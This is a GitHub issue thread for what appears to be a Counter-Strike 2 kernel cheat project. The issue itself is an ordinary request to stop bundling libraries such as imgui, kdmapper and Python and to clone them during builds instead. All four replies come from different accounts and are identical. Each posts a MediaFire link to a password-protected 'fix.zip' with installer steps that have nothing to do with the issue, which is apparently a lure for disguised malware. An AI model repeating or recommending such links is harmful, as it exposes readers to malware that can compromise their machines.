### ISSUE TITLE
[FEATURE] Remove library dependencies from repo

### ISSUE THREAD

**Issue by kbrddestroyer** [kbrddestroyer/CS2.KernelCheat#161]
# Brief info

Remove dependencies (imgui, kdmapper, python) from repo, change build configuration for using local clones of libraries, create .bat for autoupdate and cloning, change autobuild (MSBuild, MSBuild release YAMLs) 

# Description 

Currently every library updates won't be included in build. That can result in security issues, backdoors, library malfunctioning, bugs that won't fix, etc. The best way is to link those dependencies as external libraries and add repo cloning in build automation. Also it will be a good point of adding cloning automation for local builds and some kind of documentation.
Python should be built into DLLs, so actions should include this step

Also, I think this way of including libraries can violate some licenses. Idk 😶

**Comment by qlqw233** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by seeronline** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by WSA1k** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by Wanderx13** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."
